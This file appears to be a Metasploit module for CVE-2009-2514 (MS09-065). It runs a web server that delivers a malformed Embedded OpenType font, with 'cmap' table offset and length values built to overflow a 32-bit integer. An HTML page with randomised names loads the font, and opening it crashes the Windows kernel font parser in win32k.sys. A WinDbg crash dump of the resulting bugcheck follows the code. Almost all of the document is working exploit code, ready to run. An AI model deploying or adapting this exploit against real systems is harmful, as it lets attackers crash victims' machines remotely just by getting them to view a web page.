Microsoft Windows 20002008 Embedded OpenType Font Engine Remote Code Execution
1 ##
2 # $Id: ms09_065_eot_integer.rb 7470 2009−11−11 23:48:53Z hdm $
3 ##
4
5 ##
6 # This file is part of the Metasploit Framework and may be subject to
7 # redistribution and commercial restrictions. Please see the Metasploit
8 # Framework web site for more information on licensing and terms of use.
9 # http://metasploit.com/framework/
10 ##
11
12
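# Pulls in the framework core (Msf::Auxiliary, the HttpServer mixin, OptPath, Rex).
require 'msf/core'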
14
15
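# Auxiliary module that serves an HTML page referencing an embedded OpenType
# (EOT) font, and serves the font itself with one table-directory entry
# rewritten so that its offset and length wrap past 32 bits.  The kernel-side
# font parser in win32k.sys does not catch the wrap, so a vulnerable client
# bugchecks (see the crash dump below the class).
class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpServer::HTML

  # Offset/length pair written into the 'cmap' table directory entry.
  # The two values are chosen so that offset + length wraps around 32 bits.
  CMAP_OFFSET = 0xb0000000
  CMAP_LENGTH = 0xfffffffe - CMAP_OFFSET + 0xcc

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Windows EOT Font Table Directory Integer Overflow',
      'Description'    => %q{
        This module exploits an integer overflow flaw in the Microsoft Windows Embedded
        OpenType font parsing code located in win32k.sys. Since the kernel itself parses
        embedded web fonts, it is possible to trigger a BSoD from a normal web page when
        viewed with Internet Explorer.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'hdm',
      'Version'        => '$Revision: 7470 $',
      'References'     =>
        [
          [ 'CVE', '2009-2514' ],
          [ 'MSB', 'MS09-065' ],
          [ 'OSVDB', '59869' ]
        ],
      'DisclosureDate' => 'Nov 10 2009'
    ))

    # EOTFILE is the unmodified font template; only one directory entry of it
    # is patched at request time, the rest is served verbatim.
    register_options([
      OptPath.new('EOTFILE', [ true, "The EOT template to use to generate the trigger",
        File.join(Msf::Config.install_root, "data", "exploits", "pricedown.eot") ])
    ], self.class)
  end

  # Auxiliary modules are entered through #run; the HttpServer mixin does its
  # work (start the listener, dispatch to #on_request_uri) from #exploit.
  def run
    exploit
  end

  # HTTP handler: a URI ending in the per-instance random tag gets the font,
  # anything else gets the HTML page that references it.
  #
  # @param cli     [Object] client connection passed by the HttpServer mixin
  # @param request [Object] parsed request; only #uri is consulted here
  def on_request_uri(cli, request)
    @tag ||= Rex::Text.rand_text_alpha(8)
    @eot ||= ::File.read(datastore['EOTFILE'], ::File.size(datastore['EOTFILE']))

    if request.uri =~ /#{@tag}\z/
      send_font(cli)
    else
      send_page(cli)
    end
  end

  private

  # Serve a copy of the template with the 'cmap' directory entry rewritten.
  # Answers 404 (instead of raising on nil) when the template carries no
  # 'cmap' entry, since the original code would fail on `nil + 8`.
  #
  # @param cli [Object] client connection
  def send_font(cli)
    content = @eot.dup

    # Only this table entry seems to trigger the bug
    cidx = content.index('cmap')
    unless cidx
      print_error("EOT template #{datastore['EOTFILE']} has no 'cmap' table entry")
      send_not_found(cli)
      return
    end

    # Patch the two big-endian dwords 8 bytes past the tag with the
    # overflowing offset/length pair.
    content[cidx + 8, 8] = [ CMAP_OFFSET, CMAP_LENGTH ].pack("N*")

    print_status("Sending embedded font to #{cli.peerhost}:#{cli.peerport}...")
    send_response_html(cli, content, { 'Content-Type' => 'application/octet-stream' })
  end

  # Serve an HTML page whose CSS @font-face rule points the browser back at
  # this server's tagged font URL.  Title, body text and names are randomised
  # per request so no two pages look alike.
  #
  # @param cli [Object] client connection
  def send_page(cli)
    var_title = Rex::Text.rand_text_alpha(6 + rand(32))
    var_body  = Rex::Text.rand_text_alpha(64 + rand(32))
    var_font  = Rex::Text.rand_text_alpha(2 + rand(6))
    var_face  = Rex::Text.rand_text_alpha(2 + rand(32))

    content = %Q|<html><head><title>#{var_title}</title><style type="text/css">
@font-face{ font-family: '#{var_face}'; src: url('#{get_resource}/#{var_font}#{@tag}'); }
body {
  font-family: '#{var_face}';
}
</style></head><body> #{var_body} </body></html>|

    print_status("Sending HTML page with embedded font to #{cli.peerhost}:#{cli.peerport}...")
    send_response_html(cli, content, { 'Content-Type' => 'text/html' })
  end
end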
88
89 =begin
90
91 #
92 # Crash dump information
93 #
94
95 READ_ADDRESS: b0f70072
96
97 FAULTING_IP:
98 win32k!bComputeIDs+28
99 bf87c9df 8a6702 mov ah,byte ptr [edi+2]
100
101 MM_INTERNAL_CODE: 0
102
103 IMAGE_NAME: win32k.sys
104
105 DEBUG_FLR_IMAGE_TIMESTAMP: 45f013f6
106
107 MODULE_NAME: win32k
108
109 FAULTING_MODULE: bf800000 win32k
110
111 DEFAULT_BUCKET_ID: DRIVER_FAULT
112
113 BUGCHECK_STR: 0x50
114
115 PROCESS_NAME: csrss.exe
116
117 TRAP_FRAME: b22192e8 −− (.trap 0xffffffffb22192e8)
118 ErrCode = 00000000
119 eax=00000000 ebx=00000000 ecx=500000ca edx=00f70010 esi=b22198d8 edi=b0f70070
120 eip=bf87c9df esp=b221935c ebp=b2219374 iopl=0 nv up ei pl nz na pe nc
121 cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206
122 win32k!bComputeIDs+0x28:
123 bf87c9df 8a6702 mov ah,byte ptr [edi+2] ds:0023:b0f70072=??
124 Resetting default scope
125
126 LAST_CONTROL_TRANSFER: from 804f79d7 to 80526fc8
127
128 STACK_TEXT:
129 b2218e24 804f79d7 00000003 b0f70072 00000000 nt!RtlpBreakWithStatusInstruction
130 b2218e70 804f85c4 00000003 00000000 c0587b80 nt!KiBugCheckDebugBreak+0x19
131 b2219250 804f8aef 00000050 b0f70072 00000000 nt!KeBugCheck2+0x574
132 b2219270 8051c0d3 00000050 b0f70072 00000000 nt!KeBugCheckEx+0x1b
133 b22192d0 8053f90c 00000000 b0f70072 00000000 nt!MmAccessFault+0x8e7
134 b22192d0 bf87c9df 00000000 b0f70072 00000000 nt!KiTrap0E+0xcc
135 b2219374 bf87a391 00f70010 b22198d8 b2219a76 win32k!bComputeIDs+0x28
136 b22193a8 bf87a02b 00f70010 00004d18 00000000 win32k!bVerifyTTF+0xe1
137 b2219a68 bf879f0e e234b668 00f70010 00004d18 win32k!bLoadTTF+0x7c
138 b2219af0 bf879e48 e234b668 00f70010 00004d18 win32k!bLoadFontFile+0x228
139 b2219b40 bf879911 00000001 e234b660 b2219bf0 win32k!ttfdSemLoadFontFile+0x4c
140 b2219b70 bf87989f 00000001 e234b660 b2219bf0 win32k!PDEVOBJ::LoadFontFile+0x3a
141 b2219ba8 bf96370c 00000000 00000000 e234b660 win32k!vLoadFontFileView+0x12b
142 b2219c5c bf93eda9 e234b660 00000000 00000000 win32k!PUBLIC_PFTOBJ::hLoadMemFonts+0x6a
143 b2219cb4 bf9488e4 00f70000 e10ff0b0 00000000 win32k!GreAddFontMemResourceEx+0x76
144 b2219d48 8053ca28 0297cc48 00004d18 00000000 win32k!NtGdiAddFontMemResourceEx+0xb0
145 b2219d48 7c90eb94 0297cc48 00004d18 00000000 nt!KiFastCallEntry+0xf8
146 0172f6dc 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
147
148 win32k!bComputeIDs:
149 bf87c9b7 8bff mov edi,edi
150 bf87c9b9 55 push ebp
151 bf87c9ba 8bec mov ebp,esp
152 bf87c9bc 83ec10 sub esp,10h
153 bf87c9bf 8b450c mov eax,dword ptr [ebp+0Ch]
154 bf87c9c2 8b4804 mov ecx,dword ptr [eax+4]
155 bf87c9c5 53 push ebx
156 bf87c9c6 57 push edi
157 bf87c9c7 8b38 mov edi,dword ptr [eax]
158 bf87c9c9 037d08 add edi,dword ptr [ebp+8]
159 bf87c9cc 33db xor ebx,ebx
160 bf87c9ce 33c0 xor eax,eax
161 bf87c9d0 83f904 cmp ecx,4
162 bf87c9d3 895df8 mov dword ptr [ebp−8],ebx
163 bf87c9d6 894dfc mov dword ptr [ebp−4],ecx
164 bf87c9d9 0f82cf000000 jb win32k!bComputeIDs+0x1be (bf87caae)
165 bf87c9df 8a6702 mov ah,byte ptr [edi+2] <−−− the crash above
166
167 =end